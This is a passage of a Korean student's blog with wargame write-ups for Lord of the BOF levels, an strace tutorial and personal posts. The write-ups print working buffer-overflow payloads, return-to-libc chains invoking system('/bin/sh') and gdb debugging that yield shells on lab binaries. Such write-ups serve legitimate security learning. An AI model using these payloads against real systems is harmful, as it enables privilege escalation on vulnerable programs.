                   ,.

                 ,'  `.

               ,' _<>_ `.

             ,'.-'____`-.`.

           ,'_.-''    ``-._`.

         ,','      /\      `.`.

       ,' /.._  O /  \ O  _.,\ `.

     ,'/ /  \ ``-;.--.:-'' /  \ \`.

   ,' : :    \  /\`.,'/\  /    : : `.

  < <>| |   O >(< (  ) >)< O   | |<> >

   `. : :    /  \/,'`.\/  \    ; ; ,'

     `.\ \  /_..-:`--';-.._\  / /,'

       `. \`'   O \  / O   `'/ ,'

         `.`._     \/     _,','

           `..``-.____.-'',,'

             `.`-.____.-','

               `.  <>  ,'

                 `.  ,'

                   `'


[death_knight@localhost death_knight]$


RedHat 6.2 여정 끗.

내일 시험있는데 이거하고나니 새벽한시네요. 클났다.

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

Lord of the BOF  (0) 2019.02.07
xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
반응형
여러분 잠깐만, 이 단계 이상해요.

cat로 stdin에 전달하는것은 우선 맞고, 그러고서 팝렛형께 strace쓰라고 힌트도 듣고 감도 잡아서 공격을 하는데 심지어 세그멘테이션 폴트도 안뜨더라고여. 음 뷴명히 48바이트를 넣었는데. 그리고 또 이상한건 그래서 쉘코드가 문제인가? 하고 풀이에 있는 쉘코드를 사용해보았습니다. (Sanguine형 쉘코드를 잠시 썼습니다) 로그를 봐봐요.


[nightmare@localhost nightmare]$ bash2

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius


¸ù¿@P1P¸@PP@




















ㅁㄴㅇ

/bin/sh: ㅁㄴㅇ: command not found

ㄹmy-pass

/bin/sh: ㄹmy-pass: command not found

my-pass

euid = 519

throw me away

q

/bin/sh: q: command not found

exit

exit


엔터를 치다보니 저렇게 되디다..? 그러고서 조금이따 다시 해보니까


[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$

??



..라고 글을 쓰는 도중, 깨닫게 되었습니다..

"' ; cat)의 차이와 "';cat)의 차이를..

하....

아니 근데 그게 문제가 아닌거 같은데요 뭔가 포맷문제긴 하지만 띄어쓰기 문제인지는 모르겠슴다..?

근데 다른 쉘코드로는 안되네요. 왜그러지. 혹시 2f가 파이프로 전달되면 안들어가나요?

여튼 풀려서 좋네여! 처음봤을땐 매우 막막했는데 풀림



반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

Lord of the BOF  (0) 2019.02.07
xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
반응형

http://www.linuxintro.org/wiki/Strace 를 참고하겠습니다!


저는 지금 이 글을 쓰는 지금 strace를 전혀 쓸줄 모름니다. strace <file>로 실행시킬 수 있다는거밖에 모름.

자 그렇다면 같이 해봅시다. 헬로월드 프로그램을 짜서 분석해보죠

[nightmare@localhost nightmare]$ cat hello.c

#include<stdio.h>

int main()

{

printf ("Hello, World!\n");

return 0;

}


컴파일하고 strace ./파일명 으로 우선 결과물을 출력해줍시다.


[nightmare@localhost nightmare]$ strace ./hello

execve("./hello", ["./hello"], [/* 22 vars */]) = 0

brk(0)                                  = 0x8049548

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)

open("/etc/ld.so.cache", O_RDONLY)      = 3

fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

close(3)                                = 0

open("/lib/libc.so.6", O_RDONLY)        = 3

fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

mprotect(0x40105000, 30812, PROT_NONE)  = 0

old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

close(3)                                = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

munmap(0x40015000, 12210)               = 0

personality(PER_LINUX)                  = 0

getpid()                                = 1120

fstat64(0x1, 0xbffff364)                = -1 ENOSYS (Function not implemented)

fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

write(1, "Hello, World!\n", 14Hello, World!

)         = 14

munmap(0x40015000, 4096)                = 0

_exit(0)                                = ?


"To analyze strace's output you must know that the first keyword in a line of output from strace is always a syscall like open or read. Then, in parantheses, the arguments follow, then the result. "

우선 strace의 출력의 첫 키워드는 시스템콜이고, 괄호안에는 전달되는 인자라네여. 그리고 뒤에 결과가 따른다고 합니다. 아마 뒤에 = 한게 결과겠죠?

ㅋㅋ맞다고 써있네요.


"Every line follows the syntax

syscall(arguments) = return value

친절하게 시스템콜이 어떤 동작을 하는지 모르겠다면 man 2 <systemcall>이렇게 찾아보라고도 하네요.

어.. 근데 생각해보니 이게 다네요?

헐?

끗.


근데 old_mmap랑 mmap 랑 munmap 랑 같은거 같은데 뭘 하는지는 잘 감이 잡히지 않네요. 근데 왜 그동안 strace..이걸 안쓰려고 했나 모르겠ㅅ브니다. 역시 하고봐야 되는듯. 그동안 무서워서 못건드렸거든옄ㅋㅋㅋㅋㅋㅋㅋㅋ 이런..


++) mmap는 근데 메모리에 어떤 장치가 사용할 메모리를 할당해주는 것인 것 같은데, 그렇다면 각각 함수, 즉 open 이나 read, write같은 함수가 사용하는 공간을 만들어주는 것인가요? 위에 strace를 보면 각각 함수들 실행시키기 전에 하나씩 있는걸 보니..

반응형

'STUDY > Documentation' 카테고리의 다른 글

Bufferoverflow 기법 정리  (0) 2015.09.22
핸드레이  (0) 2015.09.05
strace, 제가 한번 사용해 보겠습니다.  (0) 2014.07.22
Buffer Overflow  (3) 2014.05.18
Key File  (0) 2014.05.16
Frame Pointer Overwrite/One Byte Overflow  (5) 2014.04.06
반응형

방학이 지옥이여 뭐시여 왜나한테 이런 시련을 주는겨 왜 난 학원숙제를 안하고이쓰까나


[succubus@localhost succubus]$ ls

nightmare  nightmare.c

[succubus@localhost succubus]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>


main(int argc, char *argv[])

{

        char buffer[40];

        char *addr;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // check address

        addr = (char *)&strcpy;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }//버퍼 후 ret가 strcpy여야 합니다 위에 주석의 힌트로 봐선 plt주소값을 사용하란뜻일듯여


        // overflow!

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // dangerous waterfall

        memset(buffer+40+8, 'A', 4);

}

[succubus@localhost succubus]$ cp nightmare fightmare

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare


Breakpoint 1, 0x80486ba in main ()

(gdb) p strcpy

$1 = {char *(char *, char *)} 0x400767b0 <strcpy>

(gdb) disas main

Dump of assembler code for function main:

0x80486b4 <main>:       push   %ebp

0x80486b5 <main+1>:     mov    %esp,%ebp

0x80486b7 <main+3>:     sub    $0x2c,%esp

0x80486ba <main+6>:     cmpl   $0x1,0x8(%ebp)

0x80486be <main+10>:    jg     0x80486d7 <main+35>

0x80486c0 <main+12>:    push   $0x80487db

0x80486c5 <main+17>:    call   0x80483e0 <printf>

0x80486ca <main+22>:    add    $0x4,%esp

0x80486cd <main+25>:    push   $0x0

0x80486cf <main+27>:    call   0x80483f0 <exit>

0x80486d4 <main+32>:    add    $0x4,%esp

0x80486d7 <main+35>:    movl   $0x8048410,0xffffffd4(%ebp)

0x80486de <main+42>:    push   $0x4

0x80486e0 <main+44>:    lea    0xffffffd4(%ebp),%eax

0x80486e3 <main+47>:    push   %eax

0x80486e4 <main+48>:    mov    0xc(%ebp),%eax

0x80486e7 <main+51>:    add    $0x4,%eax

0x80486ea <main+54>:    mov    (%eax),%edx

0x80486ec <main+56>:    add    $0x2c,%edx

0x80486ef <main+59>:    push   %edx

0x80486f0 <main+60>:    call   0x80483c0 <memcmp>

0x80486f5 <main+65>:    add    $0xc,%esp

0x80486f8 <main+68>:    mov    %eax,%eax

0x80486fa <main+70>:    test   %eax,%eax

0x80486fc <main+72>:    je     0x8048715 <main+97>

0x80486fe <main+74>:    push   $0x8048800

0x8048703 <main+79>:    call   0x80483e0 <printf>

0x8048708 <main+84>:    add    $0x4,%esp

0x804870b <main+87>:    push   $0x0

0x804870d <main+89>:    call   0x80483f0 <exit>

0x8048712 <main+94>:    add    $0x4,%esp

0x8048715 <main+97>:    mov    0xc(%ebp),%eax

0x8048718 <main+100>:   add    $0x4,%eax

0x804871b <main+103>:   mov    (%eax),%edx

0x804871d <main+105>:   push   %edx

0x804871e <main+106>:   lea    0xffffffd8(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x8048721 <main+109>:   push   %eax

0x8048722 <main+110>:   call   0x8048410 <strcpy> //걍 @plt안붙어있지만 이거인 쁼이 남여

0x8048727 <main+115>:   add    $0x8,%esp

0x804872a <main+118>:   lea    0xffffffd8(%ebp),%eax

0x804872d <main+121>:   push   %eax

0x804872e <main+122>:   push   $0x8048825

0x8048733 <main+127>:   call   0x80483e0 <printf>

0x8048738 <main+132>:   add    $0x8,%esp

0x804873b <main+135>:   push   $0x4

0x804873d <main+137>:   push   $0x41

0x804873f <main+139>:   lea    0xffffffd8(%ebp),%eax

0x8048742 <main+142>:   lea    0x30(%eax),%edx

0x8048745 <main+145>:   push   %edx

0x8048746 <main+146>:   call   0x8048400 <memset>

0x804874b <main+151>:   add    $0xc,%esp

0x804874e <main+154>:   leave

0x804874f <main+155>:   ret

End of assembler dump.

(gdb) q

The program is running.  Exit anyway? (y or n) y

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08"'`

„//시도해보니 됨. 올ㅋ

/*여기서 고민을 했는데 위의 프로그램은 strcpy실행 후 ret주소가 들어갈 자리를 A로 채워버립니다. 근데 왜 하필 strcpy일까염 쓰라고 그런거겠죠? 인자 리밋도 안하니 결국엔 strcpy를 사용해 ret가 들어갈 곳에 주소를 넣는거라고 생ㅇ각을 하게 됬습니다. 그래서 처음엔 strcpy인자두개 뒤에 시스템 주소와 /bin/sh주소 넣으려고 했는데 안되디다. 그래서 걍 앞에따가 넣었어요.*/

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare


Breakpoint 1, 0x80486ba in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y


/*중간에 뭔 뻘짓을 너무많이해놔서 안가리고 걍 다 지웠습니다....*/


[succubus@localhost succubus]$export BINSH=`perl -e 'print "/bin/sh"'`

bash2: export: command not found

[succubus@localhost succubus]$ export BINSH=`perl -e 'print "/bin/sh"'`

[succubus@localhost succubus]$ ls

core  fightmare  nightmare  nightmare.c

[succubus@localhost succubus]$ vi foo.c

[succubus@localhost succubus]$ gcc foo.c -o foo

foo.c: In function `main':

foo.c:5: warning: assignment makes pointer from integer without a cast

[succubus@localhost succubus]$ ./foo BINSH

0xbffffc7c

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xdc\xfa\xff\xbf", "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf"  '`

AAAAúú ¿úú ¿@BBBB|ü ¿

Segmentation fault (core dumped)


[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare AAAAúú ¿úú ¿@BBB'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/40wx $esp-80

0xbffffa74:     0xbffffb04      0xbffffab8      0x0804874b      0xbffffac0

0xbffffa84:     0x00000041      0x00000004      0x08048410      0x90909090

0xbffffa94:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaa4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffab4:     0x90909090      0x4000ae60      0x90909090      0x41414141

0xbffffac4:     0xbffffad0      0xbffffadc      0x40058ae0      0x08048441

0xbffffad4:     0x080486b4      0x00000002      0x08048441      0x080486b4

0xbffffae4:     0x00000002      0xbffffb04      0x08048350      0x0804877c

0xbffffaf4:     0x4000ae60      0xbffffafc      0x40013e90      0x00000002

0xbffffb04:     0xbffffc02      0xbffffc0e      0x00000000      0xbffffc57

(gdb) x/wx 0xbffffa90

0xbffffa90:     0x90909090

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\x98\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿˜ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿˜ú ¿'.


Program terminated with signal 11, Segmentation fault.

#0  0x41410004 in ?? () //잘 안바뀜

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xac\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿¬ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿¬ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x90909090 in ?? ()

(gdb) x/40wx 0xbffffaac

0xbffffaac:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffabc:     0x90909090      0x90909090      0x90909090      0x4000ae60

0xbffffacc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffadc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaec:     0x0800ae60      0x080486b4      0x00000002      0xbffffb14

0xbffffafc:     0x08048350      0x0804877c      0x4000ae60      0xbffffb0c

0xbffffb0c:     0x40013e90      0x00000002      0xbffffc0e      0xbffffc1a

0xbffffb1c:     0x00000000      0xbffffc57      0xbffffc6a      0xbffffc78

0xbffffb2c:     0xbffffc90      0xbffffcaf      0xbffffcd1      0xbffffcdf

0xbffffb3c:     0xbffffea2      0xbffffec1      0xbffffedf      0xbffffef4

(gdb) x/40wx 0xbffffaa8

0xbffffaa8:     0xbffffc7c      0x90909090      0x90909090      0x90909090

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0x4000ae60      0x90909090      0x90909090      0x90909090

0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae8:     0x90909090      0x0800ae60      0x080486b4      0x00000002

0xbffffaf8:     0xbffffb14      0x08048350      0x0804877c      0x4000ae60

0xbffffb08:     0xbffffb0c      0x40013e90      0x00000002      0xbffffc0e

0xbffffb18:     0xbffffc1a      0x00000000      0xbffffc57      0xbffffc6a

0xbffffb28:     0xbffffc78      0xbffffc90      0xbffffcaf      0xbffffcd1

0xbffffb38:     0xbffffcdf      0xbffffea2      0xbffffec1      0xbffffedf

(gdb) x/40wx 0xbffffaa0

0xbffffaa0:     0x40058ae0      0x42424242      0xbffffc7c      0x90909090

0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x4000ae60      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae0:     0x90909090      0x90909090      0x90909090      0x0800ae60

0xbffffaf0:     0x080486b4      0x00000002      0xbffffb14      0x08048350

0xbffffb00:     0x0804877c      0x4000ae60      0xbffffb0c      0x40013e90

0xbffffb10:     0x00000002      0xbffffc0e      0xbffffc1a      0x00000000

0xbffffb20:     0xbffffc57      0xbffffc6a      0xbffffc78      0xbffffc90

0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcdf      0xbffffea2

(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿ ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()/*뭐가 잘 안됨. 근데 걍 삘이 아 시스템 인자전달이 잘못되서 저게....라는 느낌이었슴다*/

(gdb) q


[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb) x/s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1" /*foo.c너는 대체 나에게 무슨 주소를 준것이냐..*/

(gdb) x/5s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

0xbffffcdf:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...


(gdb) x/5s 0xbffffc70

0xbffffc70:      "/bin/sh"

0xbffffc78:      "REMOTEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ exit

exit

Segmentation fault (core dumped)

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ my-pass

euid = 518


굿굿



반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
assassin->zombie_assassin  (0) 2014.05.13
반응형

왠진 모르겠지만 이번에는 새로운 단계를 오랜만에 풀어봐서 그런지 너무 재미있었습니닼ㅋㅋㅋㅋ

막 함수주소얻는데 왜케 기분이 좋은짘ㅋㅋㅋㅋㅋ


login: zombie_assassin

Password:

Last login: Fri May  2 14:40:51 from 192.168.10.1

ls

[zombie_assassin@localhost zombie_assassin]$ ls

foo  foo.c  ssssssss  succubus  succubus.c

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - succubus

        - calling functions continuously

*/


#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>


// the inspector

int check = 0;


void MO(char *cmd)

{

        if(check != 4)

                exit(0);


        printf("welcome to the MO!\n");


        // olleh!

        system(cmd);

}


void YUT(void)

{

        if(check != 3)

                exit(0);


        printf("welcome to the YUT!\n");

        check = 4;

}


void GUL(void)

{

        if(check != 2)

                exit(0);


        printf("welcome to the GUL!\n");

        check = 3;

}


void GYE(void)

{

        if(check != 1)

                exit(0);


        printf("welcome to the GYE!\n");

        check = 2;

}


void DO(void)

{

        printf("welcome to the DO!\n");

        check = 1;

}


main(int argc, char *argv[])

{

        char buffer[40];

        char *addr;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // you cannot use library

        if(strchr(argv[1], '\x40')){

                printf("You cannot use library\n");

                exit(0);

        }


        // check address

        addr = (char *)&DO;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with DO\n");

                exit(0);

        }


        // overflow!

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // stack destroyer

        // 100 : extra space for copied argv[1]

        memset(buffer, 0, 44);

        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));


        // LD_* eraser

        // 40 : extra space for memset function

        memset(buffer-3000, 0, 3000-40);

}

/*코드를 정리해주자면 버퍼+148만큼을 남겨두고 싹다 지워버립니다. 그리고 공격자는 도->개->걸->윷->모 순서로 함수를 호출해야 모가 마지막에 자신이 넘겨받은 인자를 시스템 함수로 호출해줍니다. 라이브러리의 함수는 사용할 수 없습니다. 그리고 44바이트를 채워야한다는걸 처음에 깜박했는데 44바이트+코드~~~입니다ㅋ*/


[zombie_assassin@localhost zombie_assassin]$ gdb -q ssssssss

(gdb) b main

Breakpoint 1 at 0x804880e

(gdb) r

Starting program: /home/zombie_assassin/ssssssss


Breakpoint 1, 0x804880e in main ()

(gdb) p DO

$1 = {<text variable, no debug info>} 0x80487ec <DO>

(gdb) p GYE

$2 = {<text variable, no debug info>} 0x80487bc <GYE>

(gdb) p GUL

$3 = {<text variable, no debug info>} 0x804878c <GUL>

(gdb) p YUT

$4 = {<text variable, no debug info>} 0x804875c <YUT>

(gdb) p MO

$5 = {<text variable, no debug info>} 0x8048724 <MO>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "BBBB", "CCCC"'`

¼Œ\$AAAABBBBCCCC

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

Segmentation fault (core dumped)

/*솔직히 여기서 정신못차림. 주소많아지니까 어우..*/

[zombie_assassin@localhost zombie_assassin]$ gdb -q -c core

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/40wx $esp

0xbffffaa4:     0x42424242      0x43434343      0x08048400      0x08048808

0xbffffab4:     0x00000002      0xbffffad4      0x0804839c      0x0804894c

0xbffffac4:     0x4000ae60      0xbffffacc      0x40013e90      0x00000002

0xbffffad4:     0xbffffbd0      0xbffffbdb      0x00000000      0xbffffc28

0xbffffae4:     0xbffffc42      0xbffffc50      0xbffffc68      0xbffffc87

0xbffffaf4:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb04:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb14:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb24:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb34:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) x/wx 0xbffffaa8

0xbffffaa8:     0x43434343

(gdb) q

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼Œ\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ exit

exit

Segmentation fault (core dumped)

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼Œ\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ my-pass

euid = 517


못쓰는 주소들이 정말 많은 반면 100바이트를 남겨줘서 그냥 argv[1]에따가 "/bin/sh를 넣어주고 거기로 인자를 받게 했습니다. 앞의 함수들은 인자를 받지 않기(void)때문에 그냥 리턴어드레스만 받아서 쭉쭉 실행하다가 MO같은 경우는 인자를 받기 때문에 mo의 주소+4바이트의 곳에 인자의 주소를 넣고 인자는 그 뒤의 주소를 계산해서 넣어주시면 됩니다.

얼마 안남았네염 화이팅

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
assassin->zombie_assassin  (0) 2014.05.13
giant->assassin  (0) 2014.04.22
반응형

모양새를 좀 바꿨습니다. 그래봤자 사이즈 바꾼게 전부지만..

바탕에 당근이 안보이네여.. 후.......

당근...

아 뭐 다음에 다시그리죠 뭐.. 하하..


그리고 대문 이미지에 링크가 안됐었는데 뭐 어떻게 했는지는 모르겠지만 고쳤습니다. 이제 대문 이미지를 클릭하면 홈으로 돌아갈 수 있게 됩니다! 하지만 사이즈 조절에 fail해서 사이즈를 줄이려고 스샷으로 (화질따위 버려야죠..) 가로 사이즈를 줄여 스샷을 찍어 다시 대문 이미지로 올렸었는데도 어째 고쳐지지가 않습니다? 암튼 대문이미지는 안고쳐지고 화질은 점점 꾸려져서 저것도 다시만들어야함..


안고쳐짐

다음에 다시만들죠 뭐

화질만꾸려짐ㅋㅋ


+)대문이미지 다시만들었어여 근데 사이즈 제대로 맟춰서 그려도 망함 왜저러죠 하 뭐 이상한거 건드렸나봐여

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

20150215 오늘의 뻘글  (0) 2015.02.15
20141213 오늘의 뻘글(글이 매우 두서없음)  (3) 2014.12.13
블로그 모양새  (0) 2014.06.29
이번달에 할 것  (2) 2014.06.09
pCTF2014 irc log  (2) 2014.04.13
제 프로필 사진 어떤가요  (0) 2014.03.05

+ Recent posts